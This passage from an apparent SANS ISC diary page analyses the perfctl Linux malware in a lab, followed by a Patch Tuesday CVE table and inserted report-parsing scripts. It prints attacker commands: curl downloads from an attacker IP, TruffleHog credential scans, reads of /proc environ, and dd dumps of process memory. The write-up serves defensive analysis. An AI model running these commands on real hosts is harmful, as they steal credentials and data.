Diaries

Published: 2024-10-09

From Perfctl to InfoStealer

A few days ago, a new stealthy malware targeting Linux hosts made a lot of noise: perfctl[1]. The malware has been pretty well analyzed and I won't repeat what has already been disclosed. I found a copy of the "httpd" binary (SHA256:22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13)[2] and dropped it in my lab to see how it detonated. I infected the lab without root privileges and observed the same behavior, except that some files were not written to their intended locations for lack of access (not root). When executed without root privileges, the rootkit feature is unavailable and the malware runs "disclosed", i.e. without hiding itself.

After the sandbox infection, I had two running processes:

  • perfctl
  • gnome-session-binary (This name can be different and mimic well-known Linux processes)

The resources used by the two processes are:

remnux@remnux:/$ sudo lsof -p 2637
COMMAND    PID   USER   FD      TYPE             DEVICE SIZE/OFF    NODE NAME
gnome-ses 2637 remnux  cwd       DIR                8,5     4096 1967470 /var/tmp/test
gnome-ses 2637 remnux  rtd       DIR                8,5     4096       2 /
gnome-ses 2637 remnux  txt       REG                8,5  9301499 2498448 /tmp/.perf.c/gnome-session-binary (deleted)
gnome-ses 2637 remnux  mem       REG                8,5 21444668  794483 /tmp/.xdiag/tordata/cached-microdescs
gnome-ses 2637 remnux  mem       REG                8,5     3552 2245832 /usr/share/zoneinfo/America/New_York
gnome-ses 2637 remnux    0r      CHR                1,3      0t0       6 /dev/null
gnome-ses 2637 remnux    1w      CHR                1,3      0t0       6 /dev/null
gnome-ses 2637 remnux    2w      CHR                1,3      0t0       6 /dev/null
gnome-ses 2637 remnux    3u     IPv4             186838      0t0     TCP remnux:44010->tor-exit-read-me.dfri.se:http (ESTABLISHED)
gnome-ses 2637 remnux    4u  a_inode               0,14        0   12517 [eventpoll]
gnome-ses 2637 remnux    5r     FIFO               0,13      0t0   58960 pipe
gnome-ses 2637 remnux    6w     FIFO               0,13      0t0   58960 pipe
gnome-ses 2637 remnux    7u     unix 0xffff8b2abaa0dc00      0t0   71705 type=STREAM
gnome-ses 2637 remnux    8u     unix 0xffff8b2abaa09800      0t0   58991 /tmp/.xdiag/int/.per.s type=STREAM
gnome-ses 2637 remnux    9u     unix 0xffff8b2abaa0e000      0t0   71704 type=STREAM
gnome-ses 2637 remnux   10u  a_inode               0,14        0   12517 [eventpoll]
gnome-ses 2637 remnux   11r     FIFO               0,13      0t0   71706 pipe
gnome-ses 2637 remnux   12w     FIFO               0,13      0t0   71706 pipe
gnome-ses 2637 remnux   13uW     REG                8,5        0  794471 /tmp/.xdiag/tordata/lock
gnome-ses 2637 remnux   14u     IPv4              68064      0t0     TCP localhost:37959 (LISTEN)
gnome-ses 2637 remnux   15u     IPv4              71708      0t0     TCP localhost:63582 (LISTEN)
gnome-ses 2637 remnux   16u     IPv4             187544      0t0     TCP localhost:44870->localhost:46606 (ESTABLISHED)
gnome-ses 2637 remnux   17u     IPv4             187546      0t0     TCP localhost:48816->localhost:63582 (ESTABLISHED)
gnome-ses 2637 remnux   18u     IPv4             187547      0t0     TCP localhost:63582->localhost:48816 (ESTABLISHED)
gnome-ses 2637 remnux   19u     IPv4              68080      0t0     TCP remnux:42126->tor-exit.exs.no:https (ESTABLISHED)
gnome-ses 2637 remnux   20r     FIFO               0,13      0t0  187612 pipe
gnome-ses 2637 remnux   21u     IPv4              71788      0t0     TCP localhost:44870 (LISTEN)
gnome-ses 2637 remnux   22u     IPv4              71790      0t0     TCP localhost:44869 (LISTEN)
gnome-ses 2637 remnux   23w     FIFO               0,13      0t0  187612 pipe
gnome-ses 2637 remnux   24r     FIFO               0,13      0t0  187613 pipe
gnome-ses 2637 remnux   25w     FIFO               0,13      0t0  187613 pipe

remnux@remnux:/$ sudo lsof -p 2791
COMMAND  PID   USER   FD      TYPE             DEVICE SIZE/OFF    NODE NAME
perfctl 2791 remnux  cwd       DIR                8,5     4096       2 /
perfctl 2791 remnux  rtd       DIR                8,5     4096       2 /
perfctl 2791 remnux  txt       REG                8,5  1727132 2498457 /tmp/.perf.c/perfctl
perfctl 2791 remnux    0r      CHR                1,3      0t0       6 /dev/null
perfctl 2791 remnux    1w      CHR                1,3      0t0       6 /dev/null
perfctl 2791 remnux    2w      CHR                1,3      0t0       6 /dev/null
perfctl 2791 remnux    3u  a_inode               0,14        0   12517 [eventpoll]
perfctl 2791 remnux    4r     FIFO               0,13      0t0   68184 pipe
perfctl 2791 remnux    5w     FIFO               0,13      0t0   68184 pipe
perfctl 2791 remnux    6r     FIFO               0,13      0t0   71857 pipe
perfctl 2791 remnux    7u     unix 0xffff8b2abaa0dc00      0t0   71705 type=STREAM
perfctl 2791 remnux    8w     FIFO               0,13      0t0   71857 pipe
perfctl 2791 remnux    9u  a_inode               0,14        0   12517 [eventfd]
perfctl 2791 remnux   10u  a_inode               0,14        0   12517 [eventfd]
perfctl 2791 remnux   11u  a_inode               0,14        0   12517 [eventfd]
perfctl 2791 remnux   12r      CHR                1,3      0t0       6 /dev/null
perfctl 2791 remnux   13u     IPv4             186859      0t0     TCP localhost:46606->localhost:44870 (ESTABLISHED)

That's exactly what has been described in the initial malware analysis: Tor is used for external communications and inter-process communications are performed via sockets:

tor-exit-read-me.dfri.se:443 <-> (:42126) gnome-session-binary (127.0.0.1:46606) <-> (127.0.0.1:44870) perfctl

The malware also implants a backdoor allowing remote access to the Attacker.

Indeed, after approximately 30 minutes, I saw more activity. The Attacker dropped and executed a bunch of scripts to footprint the compromised host, search for interesting files/credentials, and exfiltrate them. All files were dropped in a sub-directory of the infected user's home directory:

remnux@remnux:~/.atmp/tmp/.applocal.xdiag$ ls -al
total 2752
drwx------  1 remnux  remnux   32768  8 Oct 14:34 .
drwx------  1 remnux  remnux   32768  8 Oct 10:03 ..
-rwx------  1 remnux  remnux      36  8 Oct 09:26 aa.txt
-rwx------  1 remnux  remnux       0  8 Oct 09:06 cloud_meta.txt
-rwx------  1 remnux  remnux      64  8 Oct 09:26 debug.txt
drwx------  1 remnux  remnux   32768  8 Oct 09:07 docker
-rwx------  1 remnux  remnux    7745  8 Oct 09:24 environs.txt
-rwx------  1 remnux  remnux  208084  8 Oct 09:07 files.txt
drwx------  1 remnux  remnux   32768  8 Oct 09:20 files_other
drwx------  1 remnux  remnux   32768  8 Oct 09:20 files_th
-rwx------  1 remnux  remnux       0  8 Oct 09:13 foi.cry.txt
-rwx------  1 remnux  remnux       0  8 Oct 09:13 foi.fds.txt
-rwx------  1 remnux  remnux     612  8 Oct 09:13 foi.fs.txt
-rwx------  1 remnux  remnux       0  8 Oct 09:24 foi.varlib.txt
-rwx------  1 remnux  remnux   29994  8 Oct 09:24 foi.xy.txt
-rwx------  1 remnux  remnux   49776  8 Oct 09:06 host.txt
-rwx------  1 remnux  remnux       0  8 Oct 09:06 i1run1dmen
-rwx------  1 remnux  remnux    6592  8 Oct 09:06 local_users.txt
-rwx------  1 remnux  remnux    2682  8 Oct 09:06 modules.txt
-rwx------  1 remnux  remnux    3705  8 Oct 09:06 net.txt
-rwx------  1 remnux  remnux  124006  8 Oct 09:24 process.env.txt
-rwx------  1 remnux  remnux   20141  8 Oct 09:24 process.mem.txt
-rwx------  1 remnux  remnux  470494  8 Oct 14:54 rex.filepaths.large-1.txt
-rwx------  1 remnux  remnux       0  8 Oct 09:26 rver1
-rwx------  1 remnux  remnux    2370  8 Oct 09:08 th.filesystem.secrets.found.txt

To analyze the malware behavior, I used kunai[3] to record the system activity.

The main tool downloaded is TruffleHog[4], a well-known credentials scanner that can scan many different local or remote places. The file was downloaded from the official repository:

curl -m 1800 -fsSLk hxxps://github[.]com/trufflesecurity/trufflehog/releases/download/v3.78.2/trufflehog_3.78.2_linux_amd64.tar.gz -o th.tar.gz
tar zxvf th.tar.gz trufflehog
chmod +x trufflehog
./trufflehog --help
mv trufflehog thg
xargs -0 ./thg --concurrency=2 --no-update --no-verification --include-detectors=all filesystem
rm -f thg

I'm not sure if the scan was launched automatically or by a human: why was the TruffleHog binary executed with the "--help" parameter? Strange.

Here is the result file:

remnux@remnux:~/.atmp/tmp/.applocal.xdiag$ cat th.filesystem.secrets.found.txt
Found unverified result ???
Detector Type: URI
Decoder Type: PLAIN
Raw result: http://jschmoe:xyzzy@www.bogus.net:8000
File: /opt/procdot/plugins/pcap_tools/tcl/tcl8/http-2.8.7.tm
Line: 413

Found unverified result ???
Detector Type: URI
Decoder Type: PLAIN
Raw result: http://jschmoe:xyzzy@www.bogus.net:8000
File: /opt/procdot/plugins/pcap_tools/tcl/tcl8/http-2.8.7.tm
Line: 28

Found unverified result ???
Verification issue: More than one detector has found this result. For your safety, verification has been disabled.You can override this behavior by using the --allow-verification-overlap flag.
Detector Type: FTP
Decoder Type: PLAIN
Raw result: ftp://joe:password@proxy.example.com
File: /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.3/Lib/urllib2.py
Line: 105

Found unverified result ???
Detector Type: URI
Decoder Type: PLAIN
Raw result: http://joe:password@proxy.example.com
File: /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.3/Lib/urllib2.py
Line: 98

Found unverified result ???
Detector Type: URI
Decoder Type: PLAIN
Raw result: http://joe:password@proxy.example.com:3128
File: /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.3/Lib/urllib2.py
Line: 100

Found unverified result ???
Detector Type: URI
Decoder Type: PLAIN
Raw result: http://joe:password@proxy.example.com
File: /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.3/Lib/urllib2.py
Line: 98

Found unverified result ???
Detector Type: JDBC
Decoder Type: PLAIN
Raw result: jdbc:mysql://localhost/ziclix
File: /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.3/Lib/dbexts.py
Line: 30

Found unverified result ???
Detector Type: JDBC
Decoder Type: PLAIN
Raw result: jdbc:postgresql://localhost:5432/ziclix
File: /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.3/Lib/dbexts.py
Line: 38

Found unverified result ???
Detector Type: Github
Decoder Type: PLAIN
Raw result: 9813cde2db1f31f92fed49a4dd8aa29b21d72581
Rotation_guide: https://howtorotate.com/docs/tutorials/github/
Version: 1
File: /opt/ghidra/Ghidra/application.properties
Line: 10

Found unverified result ???
Detector Type: Github
Decoder Type: PLAIN
Raw result: 44ca5b263a955ba19ec4f57a5646d4a406a34f70
Rotation_guide: https://howtorotate.com/docs/tutorials/github/
Version: 1
File: /opt/ghidra/Ghidra/application.properties
Line: 11
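Every hit in that report is an "unverified" result, several are the same value reported from different lines of one file, and one is flagged for overlapping detectors. As an added example (not code from the diary or from the TruffleHog project), the script below parses TruffleHog's plain-text report into records and produces the counts and groupings an analyst wants before opening any file. The sample is constructed from six of the result blocks above; the key names it derives ("detector_type", "raw_result", ...) are my own normalisation of the report's labels.

```python
import re
from collections import Counter

# Constructed sample: six result blocks from the report above, verbatim (the
# "???" after "result" is how the page rendered TruffleHog's emoji marker).
TRUFFLEHOG_SAMPLE = """\
Found unverified result ???
Detector Type: URI
Decoder Type: PLAIN
Raw result: http://jschmoe:xyzzy@www.bogus.net:8000
File: /opt/procdot/plugins/pcap_tools/tcl/tcl8/http-2.8.7.tm
Line: 413

Found unverified result ???
Detector Type: URI
Decoder Type: PLAIN
Raw result: http://jschmoe:xyzzy@www.bogus.net:8000
File: /opt/procdot/plugins/pcap_tools/tcl/tcl8/http-2.8.7.tm
Line: 28

Found unverified result ???
Verification issue: More than one detector has found this result. For your safety, verification has been disabled.You can override this behavior by using the --allow-verification-overlap flag.
Detector Type: FTP
Decoder Type: PLAIN
Raw result: ftp://joe:password@proxy.example.com
File: /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.3/Lib/urllib2.py
Line: 105

Found unverified result ???
Detector Type: URI
Decoder Type: PLAIN
Raw result: http://joe:password@proxy.example.com
File: /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.3/Lib/urllib2.py
Line: 98

Found unverified result ???
Detector Type: JDBC
Decoder Type: PLAIN
Raw result: jdbc:mysql://localhost/ziclix
File: /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.3/Lib/dbexts.py
Line: 30

Found unverified result ???
Detector Type: Github
Decoder Type: PLAIN
Raw result: 9813cde2db1f31f92fed49a4dd8aa29b21d72581
Rotation_guide: https://howtorotate.com/docs/tutorials/github/
Version: 1
File: /opt/ghidra/Ghidra/application.properties
Line: 10
"""

HEADER_RE = re.compile(r"^Found (verified|unverified) result")


def parse_trufflehog(text):
    """One dict per finding. Blocks are blank-line separated; the first line
    carries the verification status, the rest are 'Key: value' pairs."""
    findings = []
    for block in re.split(r"\n\s*\n", text.strip()):
        lines = block.strip().splitlines()
        m = HEADER_RE.match(lines[0])
        if m is None:
            continue  # banner or other non-result text
        rec = {"verified": m.group(1) == "verified"}
        for line in lines[1:]:
            key, sep, value = line.partition(": ")  # values themselves contain ':'
            if not sep:
                continue
            key = key.strip().lower().replace(" ", "_")
            rec[key] = int(value) if key == "line" else value.strip()
        findings.append(rec)
    return findings


def summarize(findings):
    """Counts an analyst wants before opening a single file."""
    return {
        "total": len(findings),
        "verified": sum(f["verified"] for f in findings),
        "by_detector": Counter(f.get("detector_type", "?") for f in findings),
        "by_file": Counter(f.get("file", "?") for f in findings),
        "unique_secrets": len({(f.get("detector_type"), f.get("raw_result")) for f in findings}),
        "needs_overlap_review": sum("verification_issue" in f for f in findings),
    }


def group_by_secret(findings):
    """Collapse repeats of the same raw value in the same file into one entry
    with all line numbers, so each candidate secret is reviewed once."""
    grouped = {}
    for f in findings:
        key = (f.get("file"), f.get("detector_type"), f.get("raw_result"))
        grouped.setdefault(key, []).append(f.get("line"))
    return {k: sorted(v) for k, v in grouped.items()}


if __name__ == "__main__":
    results = parse_trufflehog(TRUFFLEHOG_SAMPLE)
    print(summarize(results))
    for (path, detector, raw), lines in sorted(group_by_secret(results).items()):
        print(f"{detector:7} {path}:{','.join(map(str, lines))}  {raw}")
```

Run against your own hosts, the same grouping tells you at a glance whether a scan like the one the Attacker ran would have found anything real, or only example credentials shipped inside vendor test files.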

The next step was to search for interesting files using a dictionary downloaded from the following URL:

curl -m 1800 -fsSLk hxxp://104[.]183[.]100[.]189/common/backup.list -o rex.filepaths.large-1.txt

The downloaded file contains 19K+ regular expressions that match "juicy" files on a file system. Example:

...
/09-managing-state/end/vue-heroes/\.env$
/0-flannel\.conf$
/0\.htpasswd$
/0loginlog$
/10-flannel\.conf$
/1C/conf$
/1C/config$
/1confirmssr\.htm$
/1\.htpasswd$
/1loginlog$
/1password$
/2004conference$
/2009-conference$
/2015/kj/config\.js$
/2019/wp-login\.php$
/2020/wp-login\.php$
/2021/wp-login\.php$
/2loginlog$
/31_structure_tests/\.env$
/3digitcode\.php$
/3loginlog$
/3-sequelize/final/\.env$
...

The Attacker ran many of these regular expressions (and more) against the list of discovered files. Then, he/she also parsed the /proc file system for interesting processes:

ls -l /proc/1327/exe
grep -s -q KMHt5Ykyq3ZkgI8CZ /proc/1327/cmdline
grep -s -q 5Y4B2Se2L4VPL6Z5nKMgIv5Ih3+oxkb5EqmzE768BFo= /proc/1327/cmdline
cat /proc/1327/environ
cat /proc/1327/cmdline
cat /proc/1327/maps

He/she also scraped process memory for interesting data by dumping it in multiple chunks:

dd if=/proc/1327/mem bs=4096 iflag=skip_bytes,count_bytes skip=94423105585152 count=4096

Docker images and containers, if any, were also inspected:

docker images
docker ps
docker ps -a

The malware replicated itself multiple times by copying its running executable (via /proc/<pid>/exe) to new binaries with innocuous names:

cp /proc/62759/exe /tmp/.perf.c/ibus-x11
cp /proc/63602/exe /tmp/.perf.c/gnome-session-ctl
cp /proc/64431/exe /tmp/.perf.c/ibus-daemon
cp /proc/65271/exe /tmp/.perf.c/ibus-x11
cp /proc/6549/exe /tmp/.perf.c/pulseaudio
cp /proc/66088/exe /tmp/.perf.c/vmtoolsd
cp /proc/66919/exe /tmp/.perf.c/ibus-daemon
cp /proc/67754/exe /tmp/.perf.c/ibus-x11
cp /proc/68583/exe /tmp/.perf.c/jq
cp /proc/69428/exe /tmp/.perf.c/systemd
cp /proc/70242/exe /tmp/.perf.c/ssh-agent
cp /proc/71046/exe /tmp/.perf.c/python3
cp /proc/71062/exe /dev/shm/libfsnldev.so
cp /proc/71062/exe /dev/shm/libpprocps.so
cp /proc/71062/exe /lib/libfsnldev.so
cp /proc/71062/exe /lib/libpprocps.so
cp /proc/7411/exe /tmp/.perf.c/systemd
cp /proc/8248/exe /tmp/.perf.c/ibus-x11
cp /proc/9084/exe /tmp/.perf.c/ibus-x11
cp /proc/9914/exe /tmp/.perf.c/systemd

Once all details are collected, they are stored in a Tar archive and exfiltrated:

trunk.6f7794aa1bd1b2b8d26eb2eae5f8df37_169.155.242.252_.tar.gz

Conclusion: even if Attackers appear to deploy "just" a simple cryptominer, they can also steal your data and probably abuse your compromised hosts in many other ways!

[1] https://www.aquasec.com/blog/perfctl-a-stealthy-malware-targeting-millions-of-linux-servers/
[2] https://www.virustotal.com/gui/file/22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13
[3] https://isc.sans.edu/diary/Kunai+Keep+an+Eye+on+your+Linux+Hosts+Activity/31054
[4] https://github.com/trufflesecurity/trufflehog

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant

Published: 2024-10-08

Microsoft Patch Tuesday - October 2024

Microsoft today released patches for 117 vulnerabilities. Three additional vulnerabilities apply to Chromium/Edge. Another three vulnerabilities are rated critical.

Five of the vulnerabilities were disclosed before today. Two vulnerabilities were not only disclosed but also exploited, according to Microsoft.

Notable Vulnerabilities:

Microsoft Management Console Remote Code Execution Vulnerability (CVE-2024-43572)

To exploit this vulnerability, the attacker must convince the victim to open a malicious file.

Open Source Curl Remote Code Execution Vulnerability (CVE-2024-6197)

This vulnerability was disclosed and patched in libcurl back in July. According to curl.se, the most likely outcome is a crash, but code execution cannot be ruled out.

Windows Hyper-V Security Feature Bypass Vulnerability (CVE-2024-20659)

The vulnerability allows an attacker to bypass the UEFI on the host machine and compromise the hypervisor and the secure kernel. Exploitation requires a reboot at the right time.

Windows MSHTML Platform Spoofing Vulnerability (CVE-2024-43573)

Yet another Windows MSHTML Platform Spoofing vulnerability. This is the fourth 0-day this year in this component. APT actors usually use these issues to make downloading and executing malware more likely.

Description
CVE | Disclosed | Exploited | Exploitability (old versions) | Exploitability (current version) | Severity | CVSS Base (AVG) | CVSS Temporal (AVG)
.NET and Visual Studio Denial of Service Vulnerability
%%cve:2024-43485%% No No - - Important 7.5 6.5
.NET and Visual Studio Remote Code Execution Vulnerability
%%cve:2024-38229%% No No - - Important 8.1 7.1
.NET, .NET Framework, and Visual Studio Denial of Service Vulnerability
%%cve:2024-43483%% No No - - Important 7.5 6.5
%%cve:2024-43484%% No No - - Important 7.5 6.5
Azure Command Line Integration (CLI) Elevation of Privilege Vulnerability
%%cve:2024-43591%% No No - - Important 8.7 7.6
Azure Monitor Agent Elevation of Privilege Vulnerability
%%cve:2024-38097%% No No - - Important 7.1 6.2
Azure Service Fabric for Linux Remote Code Execution Vulnerability
%%cve:2024-43480%% No No - - Important 6.6 5.8
Azure Stack Hyperconverged Infrastructure (HCI) Elevation of Privilege Vulnerability
%%cve:2024-38179%% No No - - Important 8.8 7.7
BitLocker Security Feature Bypass Vulnerability
%%cve:2024-43513%% No No - - Important 6.4 5.6
BranchCache Denial of Service Vulnerability
%%cve:2024-43506%% No No - - Important 7.5 6.5
%%cve:2024-38149%% No No - - Important 7.5 6.5
Chromium: CVE-2024-7025 Integer overflow in Layout
%%cve:2024-7025%% No No - - -    
Chromium: CVE-2024-9369 Insufficient data validation in Mojo
%%cve:2024-9369%% No No - - -    
Chromium: CVE-2024-9370 Inappropriate implementation in V8
%%cve:2024-9370%% No No - - -    
Code Integrity Guard Security Feature Bypass Vulnerability
%%cve:2024-43585%% No No - - Important 5.5 4.8
DeepSpeed Remote Code Execution Vulnerability
%%cve:2024-43497%% No No - - Important 8.4 7.3
Internet Small Computer Systems Interface (iSCSI) Denial of Service Vulnerability
%%cve:2024-43515%% No No - - Important 7.5 6.5
Microsoft ActiveX Data Objects Remote Code Execution Vulnerability
%%cve:2024-43517%% No No - - Important 8.8 7.7
Microsoft Configuration Manager Remote Code Execution Vulnerability
%%cve:2024-43468%% No No - - Critical 9.8 8.5
Microsoft Defender for Endpoint for Linux Spoofing Vulnerability
%%cve:2024-43614%% No No - - Important 5.5 4.8
Microsoft Excel Remote Code Execution Vulnerability
%%cve:2024-43504%% No No - - Important 7.8 6.8
Microsoft Management Console Remote Code Execution Vulnerability
%%cve:2024-43572%% Yes Yes - - Important 7.8 7.2
Microsoft Office Remote Code Execution Vulnerability
%%cve:2024-43576%% No No - - Important 7.8 6.8
%%cve:2024-43616%% No No - - Important 7.8 6.8
Microsoft Office Spoofing Vulnerability
%%cve:2024-43609%% No No - - Important 6.5 5.7
Microsoft Office Visio Remote Code Execution Vulnerability
%%cve:2024-43505%% No No - - Important 7.8 6.8
Microsoft OpenSSH for Windows Remote Code Execution Vulnerability
%%cve:2024-43581%% No No - - Important 7.1 6.2
%%cve:2024-43615%% No No - - Important 7.1 6.2
%%cve:2024-38029%% No No - - Important 7.5 6.5
Microsoft SharePoint Elevation of Privilege Vulnerability
%%cve:2024-43503%% No No - - Important 7.8 6.8
Microsoft Simple Certificate Enrollment Protocol Denial of Service Vulnerability
%%cve:2024-43541%% No No - - Important 7.5 6.5
%%cve:2024-43544%% No No - - Important 7.5 6.5
Microsoft Speech Application Programming Interface (SAPI) Remote Code Execution Vulnerability
%%cve:2024-43574%% No No - - Important 8.3 7.2
Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
%%cve:2024-43519%% No No - - Important 8.8 7.7
Microsoft Windows Storage Port Driver Elevation of Privilege Vulnerability
%%cve:2024-43560%% No No - - Important 7.8 6.8
NT OS Kernel Elevation of Privilege Vulnerability
%%cve:2024-43553%% No No - - Important 7.4 6.4
Open Source Curl Remote Code Execution Vulnerability
%%cve:2024-6197%% Yes No - - Important 8.8 7.7
Outlook for Android Elevation of Privilege Vulnerability
%%cve:2024-43604%% No No - - Important 5.7 5.0
Power BI Report Server Spoofing Vulnerability
%%cve:2024-43481%% No No - - Important 6.5 5.7
%%cve:2024-43612%% No No - - Important 6.9 6.0
Remote Desktop Client Remote Code Execution Vulnerability
%%cve:2024-43533%% No No - - Important 8.8 7.7
%%cve:2024-43599%% No No - - Important 8.8 7.7
Remote Desktop Protocol Server Remote Code Execution Vulnerability
%%cve:2024-43582%% No No - - Critical 8.1 7.1
Remote Registry Service Elevation of Privilege Vulnerability
%%cve:2024-43532%% No No - - Important 8.8 7.7
Sudo for Windows Spoofing Vulnerability
%%cve:2024-43571%% No No - - Important 5.6 4.9
Visual C++ Redistributable Installer Elevation of Privilege Vulnerability
%%cve:2024-43590%% No No - - Important 7.8 6.8
Visual Studio Code extension for Arduino Remote Code Execution Vulnerability
%%cve:2024-43488%% No No - - Critical 8.8 7.7
Visual Studio Code for Linux Remote Code Execution Vulnerability
%%cve:2024-43601%% No No - - Important 7.1 6.2
Visual Studio Collector Service Denial of Service Vulnerability
%%cve:2024-43603%% No No - - Important 5.5 4.8
Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability
%%cve:2024-43563%% No No - - Important 7.8 6.8
Windows Common Log File System Driver Elevation of Privilege Vulnerability
%%cve:2024-43501%% No No - - Important 7.8 6.8
Windows Cryptographic Information Disclosure Vulnerability
%%cve:2024-43546%% No No - - Important 5.6 4.9
Windows Graphics Component Elevation of Privilege Vulnerability
%%cve:2024-43509%% No No - - Important 7.8 6.8
%%cve:2024-43556%% No No - - Important 7.8 6.8
Windows Graphics Component Information Disclosure Vulnerability
%%cve:2024-43508%% No No - - Important 5.5 4.8
%%cve:2024-43534%% No No - - Important 6.5 5.7
Windows Hyper-V Denial of Service Vulnerability
%%cve:2024-43521%% No No - - Important 7.5 6.5
%%cve:2024-43567%% No No - - Important 7.5 6.5
%%cve:2024-43575%% No No - - Important 7.5 6.5
Windows Hyper-V Remote Code Execution Vulnerability
%%cve:2024-30092%% No No - - Important 8.0 7.0
Windows Hyper-V Security Feature Bypass Vulnerability
%%cve:2024-20659%% Yes No - - Important 7.1 6.6
Windows Kerberos Elevation of Privilege Vulnerability
%%cve:2024-38129%% No No - - Important 7.5 6.5
Windows Kerberos Information Disclosure Vulnerability
%%cve:2024-43547%% No No - - Important 6.5 5.7
Windows Kernel Denial of Service Vulnerability
%%cve:2024-43520%% No No - - Important 5.0 4.4
Windows Kernel Elevation of Privilege Vulnerability
%%cve:2024-43502%% No No - - Important 7.1 6.2
%%cve:2024-43527%% No No - - Important 7.8 6.8
%%cve:2024-37979%% No No - - Important 6.7 5.8
%%cve:2024-43511%% No No - - Important 7.0 6.1
%%cve:2024-43570%% No No - - Important 6.4 5.6
Windows Kernel-Mode Driver Elevation of Privilege Vulnerability
%%cve:2024-43535%% No No - - Important 7.0 6.1
Windows Kernel-Mode Driver Information Disclosure Vulnerability
%%cve:2024-43554%% No No - - Important 5.5 4.8
Windows Local Security Authority (LSA) Elevation of Privilege Vulnerability
%%cve:2024-43522%% No No - - Important 7.0 6.1
Windows MSHTML Platform Spoofing Vulnerability
%%cve:2024-43573%% Yes Yes - - Moderate 6.5 6.0
Windows Mobile Broadband Driver Denial of Service Vulnerability
%%cve:2024-43537%% No No - - Important 6.5 5.7
%%cve:2024-43538%% No No - - Important 6.5 5.7
%%cve:2024-43540%% No No - - Important 6.5 5.7
%%cve:2024-43542%% No No - - Important 6.5 5.7
%%cve:2024-43555%% No No - - Important 6.5 5.7
%%cve:2024-43557%% No No - - Important 6.5 5.7
%%cve:2024-43558%% No No - - Important 6.5 5.7
%%cve:2024-43559%% No No - - Important 6.5 5.7
%%cve:2024-43561%% No No - - Important 6.5 5.7
Windows Mobile Broadband Driver Remote Code Execution Vulnerability
%%cve:2024-43525%% No No - - Important 6.8 5.9
%%cve:2024-43526%% No No - - Important 6.8 5.9
%%cve:2024-43543%% No No - - Important 6.8 5.9
%%cve:2024-43523%% No No - - Important 6.8 5.9
%%cve:2024-43524%% No No - - Important 6.8 5.9
%%cve:2024-43536%% No No - - Important 6.8 5.9
Windows Netlogon Elevation of Privilege Vulnerability
%%cve:2024-38124%% No No - - Important 9.0 7.8
Windows Network Address Translation (NAT) Denial of Service Vulnerability
%%cve:2024-43562%% No No - - Important 7.5 6.5
%%cve:2024-43565%% No No - - Important 7.5 6.5
Windows Online Certificate Status Protocol (OCSP) Server Denial of Service Vulnerability
%%cve:2024-43545%% No No - - Important 7.5 6.5
Windows Print Spooler Elevation of Privilege Vulnerability
%%cve:2024-43529%% No No - - Important 7.3 6.4
Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability
%%cve:2024-38262%% No No - - Important 7.5 6.5
Windows Remote Desktop Services Tampering Vulnerability
%%cve:2024-43456%% No No - - Important 4.8 4.2
Windows Resilient File System (ReFS) Elevation of Privilege Vulnerability
%%cve:2024-43514%% No No - - Important 7.8 6.8
Windows Resilient File System (ReFS) Information Disclosure Vulnerability
%%cve:2024-43500%% No No - - Important 5.5 4.8
Windows Resume Extensible Firmware Interface Security Feature Bypass Vulnerability
%%cve:2024-37976%% No No - - Important 6.7 5.8
%%cve:2024-37982%% No No - - Important 6.7 5.8
%%cve:2024-37983%% No No - - Important 6.7 5.8
Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
%%cve:2024-38261%% No No - - Important 7.8 6.8
%%cve:2024-43608%% No No - - Important 8.8 7.7
%%cve:2024-43607%% No No - - Important 8.8 7.7
%%cve:2024-38265%% No No - - Important 8.8 7.7
%%cve:2024-43453%% No No - - Important 8.8 7.7
%%cve:2024-38212%% No No - - Important 8.8 7.7
%%cve:2024-43549%% No No - - Important 8.8 7.7
%%cve:2024-43564%% No No - - Important 8.8 7.7
%%cve:2024-43589%% No No - - Important 8.8 8.1
%%cve:2024-43592%% No No - - Important 8.8 7.7
%%cve:2024-43593%% No No - - Important 8.8 7.7
%%cve:2024-43611%% No No - - Important 8.8 7.7
Windows Scripting Engine Security Feature Bypass Vulnerability
%%cve:2024-43584%% No No - - Important 7.7 6.7
Windows Secure Channel Spoofing Vulnerability
%%cve:2024-43550%% No No - - Important 7.4 6.4
Windows Secure Kernel Mode Elevation of Privilege Vulnerability
%%cve:2024-43516%% No No - - Important 7.8 6.8
%%cve:2024-43528%% No No - - Important 7.8 6.8
Windows Shell Remote Code Execution Vulnerability
%%cve:2024-43552%% No No - - Important 7.3 6.4
Windows Standards-Based Storage Management Service Denial of Service Vulnerability
%%cve:2024-43512%% No No - - Important 6.5 5.7
Windows Storage Elevation of Privilege Vulnerability
%%cve:2024-43551%% No No - - Important 7.8 6.8
Windows Telephony Server Remote Code Execution Vulnerability
%%cve:2024-43518%% No No - - Important 8.8 7.7
Winlogon Elevation of Privilege Vulnerability
%%cve:2024-43583%% Yes No - - Important 7.8 6.8
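The table above is flat text: a title line followed by one row per CVE, with the CVE carried in a `%%cve:...%%` marker. When you need to turn a Patch Tuesday listing into a patch order, parsing it beats reading 120 rows by eye. The following parser and prioritiser is an added example, not part of this diary; it treats every non-row line as the title for the rows that follow it and ranks exploited first, then publicly disclosed, then Critical, then by CVSS base score. The sample is a constructed subset of the rows above, and the ranking order is my own choice, not Microsoft's or the ISC's.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: a subset of the rows above, in the page's own flat layout.
TABLE_SAMPLE = """\
Description
CVE Disclosed Exploited Exploitability (old versions) current version Severity CVSS Base (AVG) CVSS Temporal (AVG)
Chromium: CVE-2024-7025 Integer overflow in Layout
%%cve:2024-7025%% No No - - -    
Microsoft Configuration Manager Remote Code Execution Vulnerability
%%cve:2024-43468%% No No - - Critical 9.8 8.5
Microsoft Management Console Remote Code Execution Vulnerability
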